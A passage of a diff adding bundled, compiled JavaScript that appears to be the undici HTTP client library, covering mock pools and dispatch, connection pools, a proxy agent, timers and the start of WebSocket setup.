__unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { promisify } = __nccwpck_require__(3837) +const Pool = __nccwpck_require__(4634) +const { buildMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kMockAgent, + kClose, + kOriginalClose, + kOrigin, + kOriginalDispatch, + kConnected +} = __nccwpck_require__(4347) +const { MockInterceptor } = __nccwpck_require__(410) +const Symbols = __nccwpck_require__(2785) +const { InvalidArgumentError } = __nccwpck_require__(8045) + +/** + * MockPool provides an API that extends the Pool to influence the mockDispatches. + */ +class MockPool extends Pool { + constructor (origin, opts) { + super(origin, opts) + + if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + + this[kMockAgent] = opts.agent + this[kOrigin] = origin + this[kDispatches] = [] + this[kConnected] = 1 + this[kOriginalDispatch] = this.dispatch + this[kOriginalClose] = this.close.bind(this) + + this.dispatch = buildMockDispatch.call(this) + this.close = this[kClose] + } + + get [Symbols.kConnected] () { + return this[kConnected] + } + + /** + * Sets up the base interceptor for mocking replies from undici. 
+ */ + intercept (opts) { + return new MockInterceptor(opts, this[kDispatches]) + } + + async [kClose] () { + await promisify(this[kOriginalClose])() + this[kConnected] = 0 + this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) + } +} + +module.exports = MockPool + + +/***/ }), + +/***/ 4347: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kAgent: Symbol('agent'), + kOptions: Symbol('options'), + kFactory: Symbol('factory'), + kDispatches: Symbol('dispatches'), + kDispatchKey: Symbol('dispatch key'), + kDefaultHeaders: Symbol('default headers'), + kDefaultTrailers: Symbol('default trailers'), + kContentLength: Symbol('content length'), + kMockAgent: Symbol('mock agent'), + kMockAgentSet: Symbol('mock agent set'), + kMockAgentGet: Symbol('mock agent get'), + kMockDispatch: Symbol('mock dispatch'), + kClose: Symbol('close'), + kOriginalClose: Symbol('original agent close'), + kOrigin: Symbol('origin'), + kIsMockActive: Symbol('is mock active'), + kNetConnect: Symbol('net connect'), + kGetNetConnect: Symbol('get net connect'), + kConnected: Symbol('connected') +} + + +/***/ }), + +/***/ 9323: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { MockNotMatchedError } = __nccwpck_require__(888) +const { + kDispatches, + kMockAgent, + kOriginalDispatch, + kOrigin, + kGetNetConnect +} = __nccwpck_require__(4347) +const { buildURL, nop } = __nccwpck_require__(3983) +const { STATUS_CODES } = __nccwpck_require__(3685) +const { + types: { + isPromise + } +} = __nccwpck_require__(3837) + +function matchValue (match, value) { + if (typeof match === 'string') { + return match === value + } + if (match instanceof RegExp) { + return match.test(value) + } + if (typeof match === 'function') { + return match(value) === true + } + return false +} + +function lowerCaseEntries (headers) { + return Object.fromEntries( + Object.entries(headers).map(([headerName, headerValue]) => { + return [headerName.toLocaleLowerCase(), 
headerValue] + }) + ) +} + +/** + * @param {import('../../index').Headers|string[]|Record} headers + * @param {string} key + */ +function getHeaderByName (headers, key) { + if (Array.isArray(headers)) { + for (let i = 0; i < headers.length; i += 2) { + if (headers[i].toLocaleLowerCase() === key.toLocaleLowerCase()) { + return headers[i + 1] + } + } + + return undefined + } else if (typeof headers.get === 'function') { + return headers.get(key) + } else { + return lowerCaseEntries(headers)[key.toLocaleLowerCase()] + } +} + +/** @param {string[]} headers */ +function buildHeadersFromArray (headers) { // fetch HeadersList + const clone = headers.slice() + const entries = [] + for (let index = 0; index < clone.length; index += 2) { + entries.push([clone[index], clone[index + 1]]) + } + return Object.fromEntries(entries) +} + +function matchHeaders (mockDispatch, headers) { + if (typeof mockDispatch.headers === 'function') { + if (Array.isArray(headers)) { // fetch HeadersList + headers = buildHeadersFromArray(headers) + } + return mockDispatch.headers(headers ? 
lowerCaseEntries(headers) : {}) + } + if (typeof mockDispatch.headers === 'undefined') { + return true + } + if (typeof headers !== 'object' || typeof mockDispatch.headers !== 'object') { + return false + } + + for (const [matchHeaderName, matchHeaderValue] of Object.entries(mockDispatch.headers)) { + const headerValue = getHeaderByName(headers, matchHeaderName) + + if (!matchValue(matchHeaderValue, headerValue)) { + return false + } + } + return true +} + +function safeUrl (path) { + if (typeof path !== 'string') { + return path + } + + const pathSegments = path.split('?') + + if (pathSegments.length !== 2) { + return path + } + + const qp = new URLSearchParams(pathSegments.pop()) + qp.sort() + return [...pathSegments, qp.toString()].join('?') +} + +function matchKey (mockDispatch, { path, method, body, headers }) { + const pathMatch = matchValue(mockDispatch.path, path) + const methodMatch = matchValue(mockDispatch.method, method) + const bodyMatch = typeof mockDispatch.body !== 'undefined' ? matchValue(mockDispatch.body, body) : true + const headersMatch = matchHeaders(mockDispatch, headers) + return pathMatch && methodMatch && bodyMatch && headersMatch +} + +function getResponseData (data) { + if (Buffer.isBuffer(data)) { + return data + } else if (typeof data === 'object') { + return JSON.stringify(data) + } else { + return data.toString() + } +} + +function getMockDispatch (mockDispatches, key) { + const basePath = key.query ? buildURL(key.path, key.query) : key.path + const resolvedPath = typeof basePath === 'string' ? 
safeUrl(basePath) : basePath + + // Match path + let matchedMockDispatches = mockDispatches.filter(({ consumed }) => !consumed).filter(({ path }) => matchValue(safeUrl(path), resolvedPath)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for path '${resolvedPath}'`) + } + + // Match method + matchedMockDispatches = matchedMockDispatches.filter(({ method }) => matchValue(method, key.method)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for method '${key.method}'`) + } + + // Match body + matchedMockDispatches = matchedMockDispatches.filter(({ body }) => typeof body !== 'undefined' ? matchValue(body, key.body) : true) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for body '${key.body}'`) + } + + // Match headers + matchedMockDispatches = matchedMockDispatches.filter((mockDispatch) => matchHeaders(mockDispatch, key.headers)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for headers '${typeof key.headers === 'object' ? JSON.stringify(key.headers) : key.headers}'`) + } + + return matchedMockDispatches[0] +} + +function addMockDispatch (mockDispatches, key, data) { + const baseData = { timesInvoked: 0, times: 1, persist: false, consumed: false } + const replyData = typeof data === 'function' ? 
{ callback: data } : { ...data } + const newMockDispatch = { ...baseData, ...key, pending: true, data: { error: null, ...replyData } } + mockDispatches.push(newMockDispatch) + return newMockDispatch +} + +function deleteMockDispatch (mockDispatches, key) { + const index = mockDispatches.findIndex(dispatch => { + if (!dispatch.consumed) { + return false + } + return matchKey(dispatch, key) + }) + if (index !== -1) { + mockDispatches.splice(index, 1) + } +} + +function buildKey (opts) { + const { path, method, body, headers, query } = opts + return { + path, + method, + body, + headers, + query + } +} + +function generateKeyValues (data) { + return Object.entries(data).reduce((keyValuePairs, [key, value]) => [ + ...keyValuePairs, + Buffer.from(`${key}`), + Array.isArray(value) ? value.map(x => Buffer.from(`${x}`)) : Buffer.from(`${value}`) + ], []) +} + +/** + * @see https://developer.mozilla.org/en-US/docs/Web/HTTP/Status + * @param {number} statusCode + */ +function getStatusText (statusCode) { + return STATUS_CODES[statusCode] || 'unknown' +} + +async function getResponse (body) { + const buffers = [] + for await (const data of body) { + buffers.push(data) + } + return Buffer.concat(buffers).toString('utf8') +} + +/** + * Mock dispatch function used to simulate undici dispatches + */ +function mockDispatch (opts, handler) { + // Get mock dispatch from built key + const key = buildKey(opts) + const mockDispatch = getMockDispatch(this[kDispatches], key) + + mockDispatch.timesInvoked++ + + // Here's where we resolve a callback if a callback is present for the dispatch data. 
+ if (mockDispatch.data.callback) { + mockDispatch.data = { ...mockDispatch.data, ...mockDispatch.data.callback(opts) } + } + + // Parse mockDispatch data + const { data: { statusCode, data, headers, trailers, error }, delay, persist } = mockDispatch + const { timesInvoked, times } = mockDispatch + + // If it's used up and not persistent, mark as consumed + mockDispatch.consumed = !persist && timesInvoked >= times + mockDispatch.pending = timesInvoked < times + + // If specified, trigger dispatch error + if (error !== null) { + deleteMockDispatch(this[kDispatches], key) + handler.onError(error) + return true + } + + // Handle the request with a delay if necessary + if (typeof delay === 'number' && delay > 0) { + setTimeout(() => { + handleReply(this[kDispatches]) + }, delay) + } else { + handleReply(this[kDispatches]) + } + + function handleReply (mockDispatches, _data = data) { + // fetch's HeadersList is a 1D string array + const optsHeaders = Array.isArray(opts.headers) + ? buildHeadersFromArray(opts.headers) + : opts.headers + const body = typeof _data === 'function' + ? _data({ ...opts, headers: optsHeaders }) + : _data + + // util.types.isPromise is likely needed for jest. + if (isPromise(body)) { + // If handleReply is asynchronous, throwing an error + // in the callback will reject the promise, rather than + // synchronously throw the error, which breaks some tests. + // Rather, we wait for the callback to resolve if it is a + // promise, and then re-run handleReply with the new body. 
+ body.then((newData) => handleReply(mockDispatches, newData)) + return + } + + const responseData = getResponseData(body) + const responseHeaders = generateKeyValues(headers) + const responseTrailers = generateKeyValues(trailers) + + handler.abort = nop + handler.onHeaders(statusCode, responseHeaders, resume, getStatusText(statusCode)) + handler.onData(Buffer.from(responseData)) + handler.onComplete(responseTrailers) + deleteMockDispatch(mockDispatches, key) + } + + function resume () {} + + return true +} + +function buildMockDispatch () { + const agent = this[kMockAgent] + const origin = this[kOrigin] + const originalDispatch = this[kOriginalDispatch] + + return function dispatch (opts, handler) { + if (agent.isMockActive) { + try { + mockDispatch.call(this, opts, handler) + } catch (error) { + if (error instanceof MockNotMatchedError) { + const netConnect = agent[kGetNetConnect]() + if (netConnect === false) { + throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect disabled)`) + } + if (checkNetConnect(netConnect, origin)) { + originalDispatch.call(this, opts, handler) + } else { + throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect is not enabled for this origin)`) + } + } else { + throw error + } + } + } else { + originalDispatch.call(this, opts, handler) + } + } +} + +function checkNetConnect (netConnect, origin) { + const url = new URL(origin) + if (netConnect === true) { + return true + } else if (Array.isArray(netConnect) && netConnect.some((matcher) => matchValue(matcher, url.host))) { + return true + } + return false +} + +function buildMockOptions (opts) { + if (opts) { + const { agent, ...mockOptions } = opts + return mockOptions + } +} + +module.exports = { + getResponseData, + getMockDispatch, + addMockDispatch, + deleteMockDispatch, + buildKey, + generateKeyValues, + matchValue, + getResponse, + getStatusText, + 
mockDispatch, + buildMockDispatch, + checkNetConnect, + buildMockOptions, + getHeaderByName +} + + +/***/ }), + +/***/ 6823: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Transform } = __nccwpck_require__(2781) +const { Console } = __nccwpck_require__(6206) + +/** + * Gets the output of `console.table(…)` as a string. + */ +module.exports = class PendingInterceptorsFormatter { + constructor ({ disableColors } = {}) { + this.transform = new Transform({ + transform (chunk, _enc, cb) { + cb(null, chunk) + } + }) + + this.logger = new Console({ + stdout: this.transform, + inspectOptions: { + colors: !disableColors && !process.env.CI + } + }) + } + + format (pendingInterceptors) { + const withPrettyHeaders = pendingInterceptors.map( + ({ method, path, data: { statusCode }, persist, times, timesInvoked, origin }) => ({ + Method: method, + Origin: origin, + Path: path, + 'Status code': statusCode, + Persistent: persist ? '✅' : 'âŒ', + Invocations: timesInvoked, + Remaining: persist ? Infinity : times - timesInvoked + })) + + this.logger.table(withPrettyHeaders) + return this.transform.read().toString() + } +} + + +/***/ }), + +/***/ 8891: +/***/ ((module) => { + +"use strict"; + + +const singulars = { + pronoun: 'it', + is: 'is', + was: 'was', + this: 'this' +} + +const plurals = { + pronoun: 'they', + is: 'are', + was: 'were', + this: 'these' +} + +module.exports = class Pluralizer { + constructor (singular, plural) { + this.singular = singular + this.plural = plural + } + + pluralize (count) { + const one = count === 1 + const keys = one ? singulars : plurals + const noun = one ? this.singular : this.plural + return { ...keys, count, noun } + } +} + + +/***/ }), + +/***/ 8266: +/***/ ((module) => { + +"use strict"; +/* eslint-disable */ + + + +// Extracted from node/lib/internal/fixed_queue.js + +// Currently optimal queue size, tested on V8 6.0 - 6.6. Must be power of two. 
+const kSize = 2048; +const kMask = kSize - 1; + +// The FixedQueue is implemented as a singly-linked list of fixed-size +// circular buffers. It looks something like this: +// +// head tail +// | | +// v v +// +-----------+ <-----\ +-----------+ <------\ +-----------+ +// | [null] | \----- | next | \------- | next | +// +-----------+ +-----------+ +-----------+ +// | item | <-- bottom | item | <-- bottom | [empty] | +// | item | | item | | [empty] | +// | item | | item | | [empty] | +// | item | | item | | [empty] | +// | item | | item | bottom --> | item | +// | item | | item | | item | +// | ... | | ... | | ... | +// | item | | item | | item | +// | item | | item | | item | +// | [empty] | <-- top | item | | item | +// | [empty] | | item | | item | +// | [empty] | | [empty] | <-- top top --> | [empty] | +// +-----------+ +-----------+ +-----------+ +// +// Or, if there is only one circular buffer, it looks something +// like either of these: +// +// head tail head tail +// | | | | +// v v v v +// +-----------+ +-----------+ +// | [null] | | [null] | +// +-----------+ +-----------+ +// | [empty] | | item | +// | [empty] | | item | +// | item | <-- bottom top --> | [empty] | +// | item | | [empty] | +// | [empty] | <-- top bottom --> | item | +// | [empty] | | item | +// +-----------+ +-----------+ +// +// Adding a value means moving `top` forward by one, removing means +// moving `bottom` forward by one. After reaching the end, the queue +// wraps around. +// +// When `top === bottom` the current queue is empty and when +// `top + 1 === bottom` it's full. This wastes a single space of storage +// but allows much quicker checks. 
+ +class FixedCircularBuffer { + constructor() { + this.bottom = 0; + this.top = 0; + this.list = new Array(kSize); + this.next = null; + } + + isEmpty() { + return this.top === this.bottom; + } + + isFull() { + return ((this.top + 1) & kMask) === this.bottom; + } + + push(data) { + this.list[this.top] = data; + this.top = (this.top + 1) & kMask; + } + + shift() { + const nextItem = this.list[this.bottom]; + if (nextItem === undefined) + return null; + this.list[this.bottom] = undefined; + this.bottom = (this.bottom + 1) & kMask; + return nextItem; + } +} + +module.exports = class FixedQueue { + constructor() { + this.head = this.tail = new FixedCircularBuffer(); + } + + isEmpty() { + return this.head.isEmpty(); + } + + push(data) { + if (this.head.isFull()) { + // Head is full: Creates a new queue, sets the old queue's `.next` to it, + // and sets it as the new main queue. + this.head = this.head.next = new FixedCircularBuffer(); + } + this.head.push(data); + } + + shift() { + const tail = this.tail; + const next = tail.shift(); + if (tail.isEmpty() && tail.next !== null) { + // If there is another queue, it forms the new tail. 
+ this.tail = tail.next; + } + return next; + } +}; + + +/***/ }), + +/***/ 3198: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const DispatcherBase = __nccwpck_require__(4839) +const FixedQueue = __nccwpck_require__(8266) +const { kConnected, kSize, kRunning, kPending, kQueued, kBusy, kFree, kUrl, kClose, kDestroy, kDispatch } = __nccwpck_require__(2785) +const PoolStats = __nccwpck_require__(9689) + +const kClients = Symbol('clients') +const kNeedDrain = Symbol('needDrain') +const kQueue = Symbol('queue') +const kClosedResolve = Symbol('closed resolve') +const kOnDrain = Symbol('onDrain') +const kOnConnect = Symbol('onConnect') +const kOnDisconnect = Symbol('onDisconnect') +const kOnConnectionError = Symbol('onConnectionError') +const kGetDispatcher = Symbol('get dispatcher') +const kAddClient = Symbol('add client') +const kRemoveClient = Symbol('remove client') +const kStats = Symbol('stats') + +class PoolBase extends DispatcherBase { + constructor () { + super() + + this[kQueue] = new FixedQueue() + this[kClients] = [] + this[kQueued] = 0 + + const pool = this + + this[kOnDrain] = function onDrain (origin, targets) { + const queue = pool[kQueue] + + let needDrain = false + + while (!needDrain) { + const item = queue.shift() + if (!item) { + break + } + pool[kQueued]-- + needDrain = !this.dispatch(item.opts, item.handler) + } + + this[kNeedDrain] = needDrain + + if (!this[kNeedDrain] && pool[kNeedDrain]) { + pool[kNeedDrain] = false + pool.emit('drain', origin, [pool, ...targets]) + } + + if (pool[kClosedResolve] && queue.isEmpty()) { + Promise + .all(pool[kClients].map(c => c.close())) + .then(pool[kClosedResolve]) + } + } + + this[kOnConnect] = (origin, targets) => { + pool.emit('connect', origin, [pool, ...targets]) + } + + this[kOnDisconnect] = (origin, targets, err) => { + pool.emit('disconnect', origin, [pool, ...targets], err) + } + + this[kOnConnectionError] = (origin, targets, err) => { + 
pool.emit('connectionError', origin, [pool, ...targets], err) + } + + this[kStats] = new PoolStats(this) + } + + get [kBusy] () { + return this[kNeedDrain] + } + + get [kConnected] () { + return this[kClients].filter(client => client[kConnected]).length + } + + get [kFree] () { + return this[kClients].filter(client => client[kConnected] && !client[kNeedDrain]).length + } + + get [kPending] () { + let ret = this[kQueued] + for (const { [kPending]: pending } of this[kClients]) { + ret += pending + } + return ret + } + + get [kRunning] () { + let ret = 0 + for (const { [kRunning]: running } of this[kClients]) { + ret += running + } + return ret + } + + get [kSize] () { + let ret = this[kQueued] + for (const { [kSize]: size } of this[kClients]) { + ret += size + } + return ret + } + + get stats () { + return this[kStats] + } + + async [kClose] () { + if (this[kQueue].isEmpty()) { + return Promise.all(this[kClients].map(c => c.close())) + } else { + return new Promise((resolve) => { + this[kClosedResolve] = resolve + }) + } + } + + async [kDestroy] (err) { + while (true) { + const item = this[kQueue].shift() + if (!item) { + break + } + item.handler.onError(err) + } + + return Promise.all(this[kClients].map(c => c.destroy(err))) + } + + [kDispatch] (opts, handler) { + const dispatcher = this[kGetDispatcher]() + + if (!dispatcher) { + this[kNeedDrain] = true + this[kQueue].push({ opts, handler }) + this[kQueued]++ + } else if (!dispatcher.dispatch(opts, handler)) { + dispatcher[kNeedDrain] = true + this[kNeedDrain] = !this[kGetDispatcher]() + } + + return !this[kNeedDrain] + } + + [kAddClient] (client) { + client + .on('drain', this[kOnDrain]) + .on('connect', this[kOnConnect]) + .on('disconnect', this[kOnDisconnect]) + .on('connectionError', this[kOnConnectionError]) + + this[kClients].push(client) + + if (this[kNeedDrain]) { + process.nextTick(() => { + if (this[kNeedDrain]) { + this[kOnDrain](client[kUrl], [this, client]) + } + }) + } + + return this + } + + 
[kRemoveClient] (client) { + client.close(() => { + const idx = this[kClients].indexOf(client) + if (idx !== -1) { + this[kClients].splice(idx, 1) + } + }) + + this[kNeedDrain] = this[kClients].some(dispatcher => ( + !dispatcher[kNeedDrain] && + dispatcher.closed !== true && + dispatcher.destroyed !== true + )) + } +} + +module.exports = { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kRemoveClient, + kGetDispatcher +} + + +/***/ }), + +/***/ 9689: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const { kFree, kConnected, kPending, kQueued, kRunning, kSize } = __nccwpck_require__(2785) +const kPool = Symbol('pool') + +class PoolStats { + constructor (pool) { + this[kPool] = pool + } + + get connected () { + return this[kPool][kConnected] + } + + get free () { + return this[kPool][kFree] + } + + get pending () { + return this[kPool][kPending] + } + + get queued () { + return this[kPool][kQueued] + } + + get running () { + return this[kPool][kRunning] + } + + get size () { + return this[kPool][kSize] + } +} + +module.exports = PoolStats + + +/***/ }), + +/***/ 4634: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kGetDispatcher +} = __nccwpck_require__(3198) +const Client = __nccwpck_require__(3598) +const { + InvalidArgumentError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { kUrl, kInterceptors } = __nccwpck_require__(2785) +const buildConnector = __nccwpck_require__(2067) + +const kOptions = Symbol('options') +const kConnections = Symbol('connections') +const kFactory = Symbol('factory') + +function defaultFactory (origin, opts) { + return new Client(origin, opts) +} + +class Pool extends PoolBase { + constructor (origin, { + connections, + factory = defaultFactory, + connect, + connectTimeout, + tls, + maxCachedSessions, + socketPath, + autoSelectFamily, + autoSelectFamilyAttemptTimeout, + 
allowH2, + ...options + } = {}) { + super() + + if (connections != null && (!Number.isFinite(connections) || connections < 0)) { + throw new InvalidArgumentError('invalid connections') + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (typeof connect !== 'function') { + connect = buildConnector({ + ...tls, + maxCachedSessions, + allowH2, + socketPath, + timeout: connectTimeout, + ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), + ...connect + }) + } + + this[kInterceptors] = options.interceptors && options.interceptors.Pool && Array.isArray(options.interceptors.Pool) + ? options.interceptors.Pool + : [] + this[kConnections] = connections || null + this[kUrl] = util.parseOrigin(origin) + this[kOptions] = { ...util.deepClone(options), connect, allowH2 } + this[kOptions].interceptors = options.interceptors + ? 
{ ...options.interceptors } + : undefined + this[kFactory] = factory + } + + [kGetDispatcher] () { + let dispatcher = this[kClients].find(dispatcher => !dispatcher[kNeedDrain]) + + if (dispatcher) { + return dispatcher + } + + if (!this[kConnections] || this[kClients].length < this[kConnections]) { + dispatcher = this[kFactory](this[kUrl], this[kOptions]) + this[kAddClient](dispatcher) + } + + return dispatcher + } +} + +module.exports = Pool + + +/***/ }), + +/***/ 7858: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kProxy, kClose, kDestroy, kInterceptors } = __nccwpck_require__(2785) +const { URL } = __nccwpck_require__(7310) +const Agent = __nccwpck_require__(7890) +const Pool = __nccwpck_require__(4634) +const DispatcherBase = __nccwpck_require__(4839) +const { InvalidArgumentError, RequestAbortedError } = __nccwpck_require__(8045) +const buildConnector = __nccwpck_require__(2067) + +const kAgent = Symbol('proxy agent') +const kClient = Symbol('proxy client') +const kProxyHeaders = Symbol('proxy headers') +const kRequestTls = Symbol('request tls settings') +const kProxyTls = Symbol('proxy tls settings') +const kConnectEndpoint = Symbol('connect endpoint function') + +function defaultProtocolPort (protocol) { + return protocol === 'https:' ? 443 : 80 +} + +function buildProxyOptions (opts) { + if (typeof opts === 'string') { + opts = { uri: opts } + } + + if (!opts || !opts.uri) { + throw new InvalidArgumentError('Proxy opts.uri is mandatory') + } + + return { + uri: opts.uri, + protocol: opts.protocol || 'https' + } +} + +function defaultFactory (origin, opts) { + return new Pool(origin, opts) +} + +class ProxyAgent extends DispatcherBase { + constructor (opts) { + super(opts) + this[kProxy] = buildProxyOptions(opts) + this[kAgent] = new Agent(opts) + this[kInterceptors] = opts.interceptors && opts.interceptors.ProxyAgent && Array.isArray(opts.interceptors.ProxyAgent) + ? 
opts.interceptors.ProxyAgent + : [] + + if (typeof opts === 'string') { + opts = { uri: opts } + } + + if (!opts || !opts.uri) { + throw new InvalidArgumentError('Proxy opts.uri is mandatory') + } + + const { clientFactory = defaultFactory } = opts + + if (typeof clientFactory !== 'function') { + throw new InvalidArgumentError('Proxy opts.clientFactory must be a function.') + } + + this[kRequestTls] = opts.requestTls + this[kProxyTls] = opts.proxyTls + this[kProxyHeaders] = opts.headers || {} + + const resolvedUrl = new URL(opts.uri) + const { origin, port, host, username, password } = resolvedUrl + + if (opts.auth && opts.token) { + throw new InvalidArgumentError('opts.auth cannot be used in combination with opts.token') + } else if (opts.auth) { + /* @deprecated in favour of opts.token */ + this[kProxyHeaders]['proxy-authorization'] = `Basic ${opts.auth}` + } else if (opts.token) { + this[kProxyHeaders]['proxy-authorization'] = opts.token + } else if (username && password) { + this[kProxyHeaders]['proxy-authorization'] = `Basic ${Buffer.from(`${decodeURIComponent(username)}:${decodeURIComponent(password)}`).toString('base64')}` + } + + const connect = buildConnector({ ...opts.proxyTls }) + this[kConnectEndpoint] = buildConnector({ ...opts.requestTls }) + this[kClient] = clientFactory(resolvedUrl, { connect }) + this[kAgent] = new Agent({ + ...opts, + connect: async (opts, callback) => { + let requestedHost = opts.host + if (!opts.port) { + requestedHost += `:${defaultProtocolPort(opts.protocol)}` + } + try { + const { socket, statusCode } = await this[kClient].connect({ + origin, + port, + path: requestedHost, + signal: opts.signal, + headers: { + ...this[kProxyHeaders], + host + } + }) + if (statusCode !== 200) { + socket.on('error', () => {}).destroy() + callback(new RequestAbortedError(`Proxy response (${statusCode}) !== 200 when HTTP Tunneling`)) + } + if (opts.protocol !== 'https:') { + callback(null, socket) + return + } + let servername + if 
(this[kRequestTls]) { + servername = this[kRequestTls].servername + } else { + servername = opts.servername + } + this[kConnectEndpoint]({ ...opts, servername, httpSocket: socket }, callback) + } catch (err) { + callback(err) + } + } + }) + } + + dispatch (opts, handler) { + const { host } = new URL(opts.origin) + const headers = buildHeaders(opts.headers) + throwIfProxyAuthIsSent(headers) + return this[kAgent].dispatch( + { + ...opts, + headers: { + ...headers, + host + } + }, + handler + ) + } + + async [kClose] () { + await this[kAgent].close() + await this[kClient].close() + } + + async [kDestroy] () { + await this[kAgent].destroy() + await this[kClient].destroy() + } +} + +/** + * @param {string[] | Record} headers + * @returns {Record} + */ +function buildHeaders (headers) { + // When using undici.fetch, the headers list is stored + // as an array. + if (Array.isArray(headers)) { + /** @type {Record} */ + const headersPair = {} + + for (let i = 0; i < headers.length; i += 2) { + headersPair[headers[i]] = headers[i + 1] + } + + return headersPair + } + + return headers +} + +/** + * @param {Record} headers + * + * Previous versions of ProxyAgent suggests the Proxy-Authorization in request headers + * Nevertheless, it was changed and to avoid a security vulnerability by end users + * this check was created. 
+ * It should be removed in the next major version for performance reasons + */ +function throwIfProxyAuthIsSent (headers) { + const existProxyAuth = headers && Object.keys(headers) + .find((key) => key.toLowerCase() === 'proxy-authorization') + if (existProxyAuth) { + throw new InvalidArgumentError('Proxy-Authorization should be sent in ProxyAgent constructor') + } +} + +module.exports = ProxyAgent + + +/***/ }), + +/***/ 9459: +/***/ ((module) => { + +"use strict"; + + +let fastNow = Date.now() +let fastNowTimeout + +const fastTimers = [] + +function onTimeout () { + fastNow = Date.now() + + let len = fastTimers.length + let idx = 0 + while (idx < len) { + const timer = fastTimers[idx] + + if (timer.state === 0) { + timer.state = fastNow + timer.delay + } else if (timer.state > 0 && fastNow >= timer.state) { + timer.state = -1 + timer.callback(timer.opaque) + } + + if (timer.state === -1) { + timer.state = -2 + if (idx !== len - 1) { + fastTimers[idx] = fastTimers.pop() + } else { + fastTimers.pop() + } + len -= 1 + } else { + idx += 1 + } + } + + if (fastTimers.length > 0) { + refreshTimeout() + } +} + +function refreshTimeout () { + if (fastNowTimeout && fastNowTimeout.refresh) { + fastNowTimeout.refresh() + } else { + clearTimeout(fastNowTimeout) + fastNowTimeout = setTimeout(onTimeout, 1e3) + if (fastNowTimeout.unref) { + fastNowTimeout.unref() + } + } +} + +class Timeout { + constructor (callback, delay, opaque) { + this.callback = callback + this.delay = delay + this.opaque = opaque + + // -2 not in timer list + // -1 in timer list but inactive + // 0 in timer list waiting for time + // > 0 in timer list waiting for time to expire + this.state = -2 + + this.refresh() + } + + refresh () { + if (this.state === -2) { + fastTimers.push(this) + if (!fastNowTimeout || fastTimers.length === 1) { + refreshTimeout() + } + } + + this.state = 0 + } + + clear () { + this.state = -1 + } +} + +module.exports = { + setTimeout (callback, delay, opaque) { + return delay < 
1e3 + ? setTimeout(callback, delay, opaque) + : new Timeout(callback, delay, opaque) + }, + clearTimeout (timeout) { + if (timeout instanceof Timeout) { + timeout.clear() + } else { + clearTimeout(timeout) + } + } +} + + +/***/ }), + +/***/ 5354: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const diagnosticsChannel = __nccwpck_require__(7643) +const { uid, states } = __nccwpck_require__(9188) +const { + kReadyState, + kSentClose, + kByteParser, + kReceivedClose +} = __nccwpck_require__(7578) +const { fireEvent, failWebsocketConnection } = __nccwpck_require__(5515) +const { CloseEvent } = __nccwpck_require__(2611) +const { makeRequest } = __nccwpck_require__(8359) +const { fetching } = __nccwpck_require__(4881) +const { Headers } = __nccwpck_require__(554) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { kHeadersList } = __nccwpck_require__(2785) + +const channels = {} +channels.open = diagnosticsChannel.channel('undici:websocket:open') +channels.close = diagnosticsChannel.channel('undici:websocket:close') +channels.socketError = diagnosticsChannel.channel('undici:websocket:socket_error') + +/** @type {import('crypto')} */ +let crypto +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +/** + * @see https://websockets.spec.whatwg.org/#concept-websocket-establish + * @param {URL} url + * @param {string|string[]} protocols + * @param {import('./websocket').WebSocket} ws + * @param {(response: any) => void} onEstablish + * @param {Partial} options + */ +function establishWebSocketConnection (url, protocols, ws, onEstablish, options) { + // 1. Let requestURL be a copy of url, with its scheme set to "http", if url’s + // scheme is "ws", and to "https" otherwise. + const requestURL = url + + requestURL.protocol = url.protocol === 'ws:' ? 'http:' : 'https:' + + // 2. 
Let request be a new request, whose URL is requestURL, client is client, + // service-workers mode is "none", referrer is "no-referrer", mode is + // "websocket", credentials mode is "include", cache mode is "no-store" , + // and redirect mode is "error". + const request = makeRequest({ + urlList: [requestURL], + serviceWorkers: 'none', + referrer: 'no-referrer', + mode: 'websocket', + credentials: 'include', + cache: 'no-store', + redirect: 'error' + }) + + // Note: undici extension, allow setting custom headers. + if (options.headers) { + const headersList = new Headers(options.headers)[kHeadersList] + + request.headersList = headersList + } + + // 3. Append (`Upgrade`, `websocket`) to request’s header list. + // 4. Append (`Connection`, `Upgrade`) to request’s header list. + // Note: both of these are handled by undici currently. + // https://github.com/nodejs/undici/blob/68c269c4144c446f3f1220951338daef4a6b5ec4/lib/client.js#L1397 + + // 5. Let keyValue be a nonce consisting of a randomly selected + // 16-byte value that has been forgiving-base64-encoded and + // isomorphic encoded. + const keyValue = crypto.randomBytes(16).toString('base64') + + // 6. Append (`Sec-WebSocket-Key`, keyValue) to request’s + // header list. + request.headersList.append('sec-websocket-key', keyValue) + + // 7. Append (`Sec-WebSocket-Version`, `13`) to request’s + // header list. + request.headersList.append('sec-websocket-version', '13') + + // 8. For each protocol in protocols, combine 